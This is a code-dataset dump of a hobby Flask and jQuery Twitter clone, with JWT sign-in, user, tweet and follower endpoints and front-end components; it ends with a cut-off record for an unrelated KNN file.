"content_id": "b1eb6710496c762ac5c7fa492266f74ce3d43388",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 579,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 20,
"path": "/src/views/base.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "from flask.views import MethodView\nfrom flask import jsonify\nfrom datetime import datetime\nfrom src import app\n\nclass BaseView(MethodView):\n \n def _404(self, message):\n return jsonify({\n 'status': 'error',\n 'message': message,\n 'timestamp': datetime.utcnow().strftime(app.config['DATETIME_FORMAT'])\n }), 404\n\n def _success(self, data=None):\n return jsonify({\n 'status': 'success',\n 'data': data,\n 'timestamp': datetime.utcnow().strftime(app.config['DATETIME_FORMAT'])\n }), 200"
},
{
"alpha_fraction": 0.7872340679168701,
"alphanum_fraction": 0.7872340679168701,
"avg_line_length": 30.66666603088379,
"blob_id": "daf3c3dd5c01a7f0272e001b069246f448848d7b",
"content_id": "3d7be37d743d770ac7c715d4a74e4f6b14b523c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 94,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 3,
"path": "/src/models/__init__.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "from src.models.user import *\nfrom src.models.tweet import *\nfrom src.models.follower import *"
},
{
"alpha_fraction": 0.6791045069694519,
"alphanum_fraction": 0.6815920472145081,
"avg_line_length": 31.200000762939453,
"blob_id": "b5adec1e19f32a59577714a088e627754a3f4011",
"content_id": "050d412ce9001b98f368a496b93f7a3246c4329d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 804,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 25,
"path": "/src/models/base.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "from src import db, app\nfrom datetime import datetime\nfrom sqlalchemy.ext.hybrid import hybrid_property\nimport uuid\n\nclass BaseModel(object):\n id = db.Column(db.Integer, primary_key=True)\n oid = db.Column(db.String, nullable=False, default=str(uuid.uuid1()), unique=True)\n _created_at = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)\n _modified_at = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)\n\n def __init__(self):\n self.oid = str(uuid.uuid1())\n\n def save(self):\n db.session.add(self)\n db.session.commit()\n\n @hybrid_property\n def created_at(self):\n return self._created_at.strftime(app.config['DATETIME_FORMAT'])\n\n @created_at.setter\n def created_at(self, _created_at):\n self._created_at = _created_at"
},
{
"alpha_fraction": 0.5272727012634277,
"alphanum_fraction": 0.5398601293563843,
"avg_line_length": 18.351350784301758,
"blob_id": "e649d3fdc416f91c6a8b8649420528b9f6733fdc",
"content_id": "c86e8fa279eb1b278dbd895b8121cd483bd588d1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 715,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 37,
"path": "/src/ui/js/components/base.js",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "'use strict';\n\nexport default class BaseComponent {\n constructor(tagName) {\n this.tagName = tagName;\n\n }\n\n run() {\n if (this.tagName == undefined) {\n throw \"tagName is undefined.\";\n }\n $(this.tagName).html(this._render());\n this._bindEvents();\n }\n\n _render() {\n\n }\n\n _bindEvents() {\n\n }\n\n _parseJwt (token) {\n var base64Url = token.split('.')[1];\n var base64 = base64Url.replace('-', '+').replace('_', '/');\n return JSON.parse(window.atob(base64));\n }\n\n _getSignedInUserOid() {\n this.accessToken = localStorage.getItem('accessToken', null);\n return this._parseJwt(this.accessToken).identity;\n }\n\n\n}"
},
{
"alpha_fraction": 0.5091836452484131,
"alphanum_fraction": 0.518367350101471,
"avg_line_length": 24.763158798217773,
"blob_id": "2c433268286b1ead026d723f8be1a3604bbea88f",
"content_id": "565a934abb84259472dd16db3457fc92d3d0b80b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 980,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 38,
"path": "/src/views/user.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "from src.views.base import BaseView\nfrom src import models\nfrom flask import request\nfrom flask_jwt_extended import jwt_required\n\nclass User(BaseView):\n\n @jwt_required\n def get(self, oid=None):\n if oid is None:\n return self._get_users()\n else:\n return self._get_user(oid)\n\n def _get_user(self, oid):\n user = models.User().get_by_oid(oid)\n if user is None:\n return self._404(\"User doesn't exist.\")\n\n return self._success({\n 'oid': user.oid,\n 'name': user.name,\n 'email': user.email\n })\n\n def _get_users(self):\n users = models.User().query.all()[:100]\n if not users:\n return self._404(\"No users found.\")\n\n result = []\n for user in users:\n result.append({\n 'oid': user.oid,\n 'name': user.name,\n 'email': user.email\n })\n return self._success(result)\n\n"
},
{
"alpha_fraction": 0.7439024448394775,
"alphanum_fraction": 0.7439024448394775,
"avg_line_length": 29.875,
"blob_id": "46ae1a87741349c4b9ca7845a1d1f7da5e33cbf9",
"content_id": "6caa71c635c51389a4477750bbaee41185944d93",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 246,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 8,
"path": "/src/run.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "import sys, os\n# Load project into system path\n# so that all the modules can be called\n# from the root of the project.\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\nfrom src.urls import *\nfrom src.commands import *"
},
{
"alpha_fraction": 0.5092838406562805,
"alphanum_fraction": 0.510079562664032,
"avg_line_length": 23.019107818603516,
"blob_id": "dd231b3a15217e59fb84fe35cde549416166dd24",
"content_id": "ea0c9333d12e1f1009960e97febb3b825019b6a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 3770,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 157,
"path": "/src/ui/js/index.js",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "'use strict';\n\n\nclass Auth {\n\n constructor() {\n this.authService = new AuthService();\n this.accessToken = localStorage.getItem('accessToken', null);\n this.refreshToken = localStorage.getItem('refreshToken', null);\n \n // Check if accessToken is valid and if valid login user\n this._autoSignin()\n }\n\n _autoSignin() {\n let self = this;\n self.validateAccessToken()\n .then(function(data){\n self._goToHome()\n }).catch(function(err){\n console.log(err);\n });\n }\n\n _setAccessToken (accessToken) {\n localStorage.setItem('accessToken', accessToken);\n }\n\n _setRefreshToken (refreshToken) {\n localStorage.setItem('refreshToken', refreshToken);\n }\n\n _getAccessToken (accessToken) {\n return localStorage.getItem('accessToken', null);\n }\n\n _getRefreshToken (refreshToken) {\n return localStorage.getItem('refreshToken', null);\n }\n\n signin() {\n let self = this;\n \n self._fetchTokens()\n .then(function(data){\n self._goToHome();\n }).catch(function(e) {\n console.log(e);\n })\n }\n\n validateAccessToken() {\n let accessToken = this._getAccessToken()\n return this.authService.validateAccessToken(accessToken);\n }\n\n _fetchTokens() {\n let self = this;\n let email = $('.signin-email input').val();\n let password = $('.signin-password input').val();\n \n return this.authService.signin(email, password)\n .then(function(data) {\n self._setAccessToken(data.data['access_token'])\n self._setRefreshToken(data.data['refresh_token'])\n return data;\n });\n }\n\n _goToHome() {\n document.location = \"/home\";\n }\n\n signup() {\n var self = this;\n let name = $('.signup-name input').val();\n let email = $('.signup-email input').val();\n let password = $('.signup-password input').val();\n \n this.authService.signup(name, email, password)\n .then(function (argument) {\n self._goToSigninPage();\n }).catch(function() {\n self._goToSignupPage();\n })\n }\n\n _goToSigninPage() {\n document.location = '/?show=signin';\n }\n\n _goToSignupPage() {\n document.location = '/?show=signup';\n }\n}\n\nclass AuthService {\n signup(name, email, password) {\n return $.ajax({\n url: \"/auth/signup.json\",\n type: 'POST',\n data: {\n name: name,\n email: email,\n password: password\n }\n });\n }\n\n signin(email, password) {\n return $.ajax({\n url: \"/auth/signin.json\",\n method: 'POST',\n context: this,\n data: {\n email: email,\n password: password\n }\n });\n }\n\n validateAccessToken(accessToken) {\n return $.ajax({\n url: \"/auth/validate-token.json\",\n method: 'POST',\n beforeSend: function (xhr) {\n xhr.setRequestHeader('Authorization', 'Bearer ' + accessToken);\n }\n });\n }\n}\n\n\nfunction indexPageView() {\n if (location.search.length) {\n let params = location.search.substring(1).split('=')\n if(params[1] == 'signup') {\n $(\".signin\").hide();\n } else if(params[1] == 'signin') {\n $(\".signup\").hide();\n }\n }\n}\n\n$(function(){\n indexPageView();\n\n let auth = new Auth();\n $('.signin-submit').click(function (argument) {\n auth.signin();\n });\n\n $('.signup-submit').click(function (argument) {\n auth.signup()\n });\n \n})"
},
{
"alpha_fraction": 0.5835305452346802,
"alphanum_fraction": 0.5906294584274292,
"avg_line_length": 29.955883026123047,
"blob_id": "60eb227e2a35fc51dec0876be78e74dc49e4ebef",
"content_id": "8a3fcc4fe938236aafd85125270c92944834ac28",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2113,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 68,
"path": "/src/views/auth.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "from src.views.base import BaseView\nfrom src import models\nfrom flask import request\nfrom src import db, jwt, app\nfrom flask_jwt_extended import create_access_token, create_refresh_token, jwt_required\nfrom datetime import timedelta\n\n\nclass Auth(BaseView):\n def post(self):\n args = request.form\n if not('email' in args and 'password' in args):\n return self._404('Invalid data')\n return self._authenticate_user(args['email'], args['password'])\n\n def _authenticate_user(self, email, password):\n user = models.User().get_by_email(email)\n if user is None:\n return self._404('User does\\'t exist.')\n\n if user.authenticate(password):\n access_token, refresh_token = self._create_tokens(user.oid)\n return self._success({\n 'access_token': access_token,\n 'refresh_token': refresh_token\n })\n else:\n return self._404('Invalid credentials.')\n\n def _create_tokens(self, identity):\n access_token = create_access_token(\n identity, \n expires_delta=timedelta(days=app.config['ACCESS_TOKEN_EXPIRY'])\n )\n refresh_token = create_refresh_token(\n identity,\n expires_delta=timedelta(days=app.config['REFRESH_TOKEN_EXPIRY'])\n )\n return access_token, refresh_token\n\n\nclass Signup(BaseView):\n def post(self):\n args = request.form\n if not('name' in args and 'email' in args and 'password' in args):\n return self._404('Invalid data')\n\n return self._create_user(args)\n\n def _create_user(self, args):\n user = models.User(name=args['name'], email=args['email'], password=args['password'])\n try:\n user.save()\n except Exception as e:\n return self._404('User already exists')\n \n return self._success({\n 'name': user.name,\n 'email': user.email,\n 'oid': user.oid\n })\n\n\nclass ValidateAccessToken(BaseView):\n\n @jwt_required\n def post(self):\n return self._success()\n "
},
{
"alpha_fraction": 0.6427648663520813,
"alphanum_fraction": 0.6427648663520813,
"avg_line_length": 27.685184478759766,
"blob_id": "6edd4133a091a8795f600e780bfb73de38221168",
"content_id": "24a88efdda6500b8dd9bcbb7f5f8cb1e53fe077f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1548,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 54,
"path": "/src/ui/js/home.js",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "'use strict';\n\nimport DefaultView from \"/asset/js/views.js\";\nimport TweetModal from \"/asset/js/components/tweetModal.js\";\nimport FollowerList from \"/asset/js/components/followerList.js\";\nimport FollowersTweetList from \"/asset/js/components/followersTweetList.js\";\nimport UserSuggestions from \"/asset/js/components/userSuggestions.js\";\n\nclass Home extends DefaultView {\n constructor() {\n super()\n }\n\n _setupView(oid) {\n let self = this;\n this.userService.getUser(oid)\n .then(function(data) {\n self._setupUserProfile(data.data)\n });\n\n let tweetModal = new TweetModal('tweetbox');\n tweetModal.onTweetPublished = function (tweetContent) {\n tweetModal.closeModal();\n }\n tweetModal.run()\n\n let followerList = new FollowerList('followerslist')\n followerList.run()\n\n let followersTweetList = new FollowersTweetList('followerstweetlist', this.getSignedInUserOid())\n followersTweetList.run()\n\n let userSuggestions = new UserSuggestions('user-suggestions', oid);\n userSuggestions.run();\n\n }\n \n _setupUserSuggestions(data) {\n let userSuggestions = this._renderUserCell(data);\n $('.user-suggestions .users-list').html(userSuggestions);\n }\n}\n\n$(function(){\n let home = new Home(); \n $(\".page-controls .logout\").click(function() {\n localStorage.clear();\n home.goToSignin();\n })\n\n $(\".page-controls .post-tweet\").click(function(){\n tweetModal.openModal();\n })\n});"
},
{
"alpha_fraction": 0.4996342360973358,
"alphanum_fraction": 0.5003657937049866,
"avg_line_length": 30.813953399658203,
"blob_id": "a773e861aad677b54b5c3f4b30fbb47f5dbf5880",
"content_id": "0933932fa8791a599f740880375aa01690120275",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1367,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 43,
"path": "/src/ui/js/components/followerList.js",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "'use strict';\n\nimport BaseComponent from \"/asset/js/components/base.js\";\nimport {FollowerService} from \"/asset/js/services.js\";\n\nexport default class FollowerList extends BaseComponent {\n constructor(tagName) {\n super(tagName);\n let self = this;\n this.followerService = new FollowerService();\n this.signedInUser = this._getSignedInUserOid();\n }\n\n run() {\n let self = this;\n if (this.tagName == undefined) {\n throw \"tagName is undefined.\";\n }\n this.followerService.getFollowers(this.signedInUser)\n .then(function(data) {\n $(self.tagName).html(self._render(data.data));\n self._bindEvents();\n })\n }\n\n _render(users) {\n let userCells = users.map(function(user) {\n if(user == undefined) return;\n return `<div class=\"user\">\n <div class=\"name\">\n <a href=\"/user/${user.oid}\">${user.name}</a>\n </div>\n <div class=\"email\">${user.email}</div>\n </div>`;\n }).join('')\n return `<div class=\"followers\">\n <div>Followers (<span class=\"followers-count\">0</span>)</div>\n <div class=\"users-list\">\n ${userCells}\n </div>\n </div>`;\n }\n}"
},
{
"alpha_fraction": 0.6770186424255371,
"alphanum_fraction": 0.6770186424255371,
"avg_line_length": 39.275001525878906,
"blob_id": "7151c1762c389f8ecc81c748984294340cbe4588",
"content_id": "29e329da08c7893fc6edf0986faf91f270591d3b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1610,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 40,
"path": "/src/urls.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "from src import app\nfrom src.views import (\n user, auth, tweet, follower, ui\n)\n\n# API URI's\n# AUTH\napp.add_url_rule('/auth/signup.json', view_func=auth.Signup.as_view('signup'), methods=['POST',])\napp.add_url_rule('/auth/signin.json', view_func=auth.Auth.as_view('signin'), methods=['POST',])\napp.add_url_rule('/auth/validate-token.json', view_func=auth.ValidateAccessToken.as_view('validate'), methods=['POST',])\n\n# User\napp.add_url_rule('/user.json', view_func=user.User.as_view('get_users'), methods=['GET',])\napp.add_url_rule('/user/<string:oid>.json', view_func=user.User.as_view('get_user'), methods=['GET',])\n\napp.add_url_rule(\n '/tweet/<string:oid>.json', view_func=tweet.Tweet.as_view('read_tweets'), methods=['GET'])\napp.add_url_rule(\n '/tweet.json', view_func=tweet.Tweet.as_view('post_tweet'), methods=['POST'])\n\napp.add_url_rule(\n '/follower/<string:oid>.json',\n view_func=follower.Follower.as_view('get_followers'), methods=['GET'])\n\napp.add_url_rule(\n '/follower/<string:oid>/tweets.json',\n view_func=follower.FollowerTweets.as_view('get_followers_tweet'), methods=['GET'])\n\n\napp.add_url_rule(\n '/follower.json',\n view_func=follower.Follower.as_view('create_followers'), methods=['POST'])\n\n\n# TEMPLATE AND ASSET URI's\napp.add_url_rule('/', view_func=ui.Index.as_view('index'), methods=['GET'])\napp.add_url_rule('/asset/<path:path>', view_func=ui.Static.as_view('asset'), methods=['GET'])\n\napp.add_url_rule('/home', view_func=ui.Home.as_view('home'), methods=['GET'])\napp.add_url_rule('/user/<string:oid>', view_func=ui.Profile.as_view('user_profile'), methods=['GET'])"
},
{
"alpha_fraction": 0.6528555154800415,
"alphanum_fraction": 0.6539753675460815,
"avg_line_length": 29.79310417175293,
"blob_id": "0c941fbffb062de0d57c6da4ee58afad2b8df636",
"content_id": "dd07ef710009cdc003294ca64ee30964b179dde5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 893,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 29,
"path": "/src/views/ui.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "from src.views.base import BaseView\nfrom src import app\nfrom src.views import StaticMixin\nfrom flask import Response\n \n\nclass Index(StaticMixin, BaseView):\n def get(self):\n content = self._get_file(\"templates/index.html\")\n return Response(content, mimetype=\"text/html\")\n\nclass Static(StaticMixin, BaseView):\n mimes = {\n 'js': 'text/javascript',\n 'css': 'text/css'\n }\n def get(self, path):\n content = self._get_file(path)\n return Response(content, mimetype=self.mimes[path.split('.')[-1]])\n\nclass Home(StaticMixin, BaseView):\n def get(self):\n content = self._get_file(\"templates/home.html\")\n return Response(content, mimetype=\"text/html\")\n\nclass Profile(StaticMixin, BaseView):\n def get(self, oid):\n content = self._get_file(\"templates/profile.html\")\n return Response(content, mimetype=\"text/html\")\n"
},
{
"alpha_fraction": 0.5641025900840759,
"alphanum_fraction": 0.7179487347602844,
"avg_line_length": 18.75,
"blob_id": "bbbe5a654418e5706cae40bf94e8b181db6967ac",
"content_id": "3a84ee6ba002bfbbe2acbd2e560983eb08507992",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 78,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 4,
"path": "/requirements.txt",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "Flask==1.0.2\nFlask-SQLAlchemy==2.3.2\nFlask-API==1.0\nFlask-JWT-Extended==3.13.1"
},
{
"alpha_fraction": 0.5276710391044617,
"alphanum_fraction": 0.5315142273902893,
"avg_line_length": 35.64788818359375,
"blob_id": "a294ee712ab24ba77bdc5cc30193368fd79995ae",
"content_id": "ad496b4266f3bcf156065a048f3769672f65fba6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2602,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 71,
"path": "/src/ui/js/components/tweetModal.js",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "'use strict';\n\nimport BaseComponent from \"/asset/js/components/base.js\";\nimport {TweetService} from \"/asset/js/services.js\";\n\nexport default class TweetModal extends BaseComponent {\n constructor(tagName) {\n super(tagName)\n this.tweetService = new TweetService();\n this.signedInUserOid = this._getSignedInUserOid();\n }\n\n _render() {\n return `<div id=\"tweet-modal-overlay\">\n <div class=\"tweet-modal\">\n <div class=\"modal-header\">Tweet</div>\n <div class=\"modal-body\">\n <div class=\"tweet-input\">\n <textarea placeholder=\"What's on your mind?\"></textarea>\n </div>\n <div class=\"tweet-controls\">\n <span class=\"char-count\">(0/280)</span>\n <button class=\"tweet-cancel-button\" type=\"button\">Cancel</button>\n <button class=\"tweet-publish-button\" type=\"button\">Publish</button>\n </div>\n </div>\n </div>\n </div>`;\n }\n\n _bindEvents() {\n let self = this;\n $('#tweet-modal-overlay .modal-body textarea').keyup(function() {\n let tweetLength = $('#tweet-modal-overlay .modal-body textarea').val().length;\n $('#tweet-modal-overlay .modal-body .char-count').html(`(${tweetLength}/280)`);\n if (tweetLength > 280) {\n $('#tweet-modal-overlay .modal-body .char-count').css('color', 'red');\n $('#tweet-modal-overlay .modal-body .tweet-publish-button').hide();\n } else {\n $('#tweet-modal-overlay .modal-body .char-count').css('color', 'black');\n $('#tweet-modal-overlay .modal-body .tweet-publish-button').show();\n }\n })\n\n $('#tweet-modal-overlay .modal-body .tweet-cancel-button').click(function() {\n $('#tweet-modal-overlay').hide();\n })\n\n $('#tweet-modal-overlay .modal-body .tweet-publish-button').click(function() {\n let tweetContent = $('#tweet-modal-overlay .modal-body textarea').val();\n if(!tweetContent.length) return false;\n \n self.tweetService.postTweet(self.signedInUserOid, tweetContent)\n .then(function(){\n self.onTweetPublished(tweetContent);\n })\n })\n }\n\n onTweetPublished() {\n\n }\n\n closeModal() {\n $('#tweet-modal-overlay .tweet-modal .modal-body .tweet-cancel-button').click();\n }\n\n openModal() {\n $('#tweet-modal-overlay').show();\n }\n}\n"
},
{
"alpha_fraction": 0.6237623691558838,
"alphanum_fraction": 0.6295865178108215,
"avg_line_length": 30.218181610107422,
"blob_id": "8ae98ed86a4539e873cff42bee340f39d2612b74",
"content_id": "b3e02fdcff4e2fc46a93f8bb03ea9c3197246b87",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1717,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 55,
"path": "/src/models/user.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "from src import db\nfrom src.models.base import BaseModel\nfrom sqlalchemy.orm import validates, relationship\nfrom sqlalchemy.ext.hybrid import hybrid_property\nfrom werkzeug.security import generate_password_hash, check_password_hash\n\nclass User(BaseModel, db.Model):\n name = db.Column(db.String(150), nullable=False)\n email = db.Column(db.String(200), unique=True)\n _password_hash = db.Column(db.Text, nullable=False)\n tweets = relationship('Tweet', back_populates='user')\n # followers = relationship('Follower', back_populates='follower')\n is_active = db.Column(db.Boolean, nullable=False, default=True)\n\n def __init__(self, name=None, email=None, password=None):\n if name is not None and email is not None and password is not None:\n self.name = name\n self.email = email\n self.password = password\n\n super().__init__()\n\n @validates('email')\n def validate_email(self, key, email):\n assert '@' in email\n return email\n\n def authenticate(self, password):\n return check_password_hash(self._password_hash, password)\n\n @hybrid_property\n def password(self):\n return\n\n @password.setter\n def password(self, _password):\n self._password_hash = generate_password_hash(_password)\n\n def get_by_oid(self, oid):\n users = self.query.filter(User.oid == oid)\n \n if users.count() == 1:\n return users[0]\n else:\n return None\n\n def get_by_email(self, email):\n users = self.query.filter(User.email == email)\n if users.count() == 1:\n return users[0]\n else:\n return None\n\n def __repr__(self):\n return self.email\n"
},
{
"alpha_fraction": 0.7881355881690979,
"alphanum_fraction": 0.7881355881690979,
"avg_line_length": 20.545454025268555,
"blob_id": "fc5f0334c0b074147e892e778eb6225f8a5b47c7",
"content_id": "e512c0a30408e0c4902f71502d7cfd21e0cc199a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 236,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 11,
"path": "/src/__init__.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom src.settings import Config\nfrom flask_jwt_extended import JWTManager\n\napp = Flask(__name__)\n\napp.config.from_object(Config)\n\ndb = SQLAlchemy(app)\njwt = JWTManager(app)"
},
{
"alpha_fraction": 0.5291396975517273,
"alphanum_fraction": 0.5291396975517273,
"avg_line_length": 28.243244171142578,
"blob_id": "9a46a0fa979597510cfa4c23311bbf50b37c9617",
"content_id": "5b62054cdada90b2e313dca9254ad893d1d0e951",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1081,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 37,
"path": "/src/ui/js/components/tweetList.js",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "'use strict';\n\nimport BaseComponent from \"/asset/js/components/base.js\";\nimport {TweetService} from \"/asset/js/services.js\";\n\nexport default class TweetList extends BaseComponent {\n constructor(tagName, userOid) {\n super(tagName);\n let self = this;\n this.userOid = userOid;\n this.tweetService = new TweetService();\n }\n\n run() {\n let self = this;\n if (this.tagName == undefined) {\n throw \"tagName is undefined.\";\n }\n this.tweetService.getTweetsOfUser(this.userOid)\n .then(function(data) {\n $(self.tagName).html(self._render(data.data));\n self._bindEvents();\n })\n }\n\n _render(tweets) {\n return tweets.map(function(tweet) {\n return `<div class=\"tweet-box\">\n <div class=\"content\">${tweet.tweet}</div>\n <div class=\"meta\">\n <div class=\"name\">${tweet.name}</div>\n <div class=\"timestamp\">${tweet.created_at}</div>\n </div>\n </div>`;\n }).join('')\n }\n}"
},
{
"alpha_fraction": 0.5191537737846375,
"alphanum_fraction": 0.5191537737846375,
"avg_line_length": 20.875,
"blob_id": "f564982b4f719b4a6c2a9d043e12772348b1a3a2",
"content_id": "88cd7a2b8e1633938c742333abad6dd4d33b1d52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1749,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 80,
"path": "/src/ui/js/services.js",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "'use strict';\n\nexport default class BaseService {\n constructor() {\n this.accessToken = localStorage.getItem('accessToken', null);\n }\n\n _ajax(url, method, data) {\n var self = this;\n if (url == undefined) {\n return false;\n }\n\n if (method == undefined) {\n method = 'GET';\n }\n\n if (data == undefined) {\n data = {};\n }\n return $.ajax({\n url: url,\n type: method.toUpperCase(),\n data: data,\n beforeSend: function (xhr) {\n xhr.setRequestHeader('Authorization', 'Bearer ' + self.accessToken);\n }\n })\n }\n}\n\n\nclass TweetService extends BaseService{\n constructor() {\n super();\n this.followerService = new FollowerService();\n \n }\n\n getTweetsOfUser(oid) {\n return this._ajax(\"/tweet/\" + oid + '.json')\n }\n\n getTweetsOfFollowers(oid) {\n return this._ajax(\"/follower/\" + oid + \"/tweets.json\")\n }\n\n postTweet(userOid, tweet) {\n return this._ajax('/tweet.json', 'POST', {\n 'oid': userOid,\n 'content': tweet\n })\n }\n}\n\nclass UserService extends BaseService {\n getUser(oid) {\n return this._ajax(\"/user/\" + oid + '.json');\n }\n\n getUsers() {\n return this._ajax(\"/user.json\");\n }\n}\n\n\nclass FollowerService extends BaseService{\n getFollowers(userOid) {\n return this._ajax(\"/follower/\" + userOid + '.json');\n }\n\n followUser(leader_oid, follower_oid) {\n return this._ajax(\"/follower.json\", 'POST', {\n leader_oid: leader_oid,\n follower_oid: follower_oid\n })\n }\n}\n\nexport {UserService, FollowerService, TweetService};"
},
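Editorial aside: every request in `services.js` rides on the same convention, attaching the stored access token as an `Authorization: Bearer ...` header before sending. A hedged Python equivalent of that protocol using `requests` (the URL and token below are illustrative assumptions, not repo endpoints):

```python
# Hypothetical Python counterpart to BaseService._ajax's beforeSend hook.
import requests

def get_with_token(url, access_token, params=None):
    # same effect as xhr.setRequestHeader('Authorization', 'Bearer ' + token)
    headers = {"Authorization": f"Bearer {access_token}"}
    return requests.get(url, headers=headers, params=params, timeout=10)

# Example (assumed local endpoint):
# resp = get_with_token("http://localhost:5000/tweet/1.json", token)
```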
{
"alpha_fraction": 0.63564133644104,
"alphanum_fraction": 0.63564133644104,
"avg_line_length": 27.387096405029297,
"blob_id": "24fe79590ef07875c2a652e8e3f66e99b417aa9e",
"content_id": "ca0a9faa7de333a2af227bbaa16dbbf3e0e72ebb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 881,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 31,
"path": "/src/models/tweet.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "from src import db, app\nfrom src.models.base import BaseModel\nfrom sqlalchemy.orm import validates, relationship\nfrom sqlalchemy.ext.hybrid import hybrid_property\n\nclass Tweet(BaseModel, db.Model):\n _tweet = db.Column(db.Text, nullable=False)\n user_id = db.Column(db.Integer, db.ForeignKey('user.id'))\n user = relationship('User', back_populates='tweets', foreign_keys=[user_id])\n\n def __init__(self, user=None, tweet=None):\n if user is not None:\n self.user_id = user.id\n\n if tweet is not None:\n self.tweet = tweet\n\n super().__init__()\n\n @hybrid_property\n def tweet(self):\n return self._tweet\n\n @validates\n def validate_tweet(self, _tweet):\n assert len(_tweet) <= app.config['TWEET_CHARACTER_LIMIT']\n return _tweet\n\n @tweet.setter\n def tweet(self, _tweet):\n self._tweet = _tweet\n\n"
}
] | 27 |
ThinkAI-GP/KNN
|
https://github.com/ThinkAI-GP/KNN
|
ab2bd5e34f58a8f3a7df15b71e32d265dc089742
|
f0bbb02d752dab85b299902b0778ff8d64f9f5a0
|
85d264cf2a5646a9bf9b3d462827070b1e3a226f
|
refs/heads/master
| 2020-09-17T04:29:34.165532 | 2019-11-25T17:14:17 | 2019-11-25T17:14:17 | 223,989,038 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7227877974510193,
"alphanum_fraction": 0.7259201407432556,
"avg_line_length": 20.21666717529297,
"blob_id": "9308f8b2fd71f5bd96fbcead8a5f88b8b94896e5",
"content_id": "d7b9106c58a71b5b310405ec3ca1f02d4f769c58",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1277,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 60,
"path": "/KNN.py",
"repo_name": "ThinkAI-GP/KNN",
"src_encoding": "UTF-8",
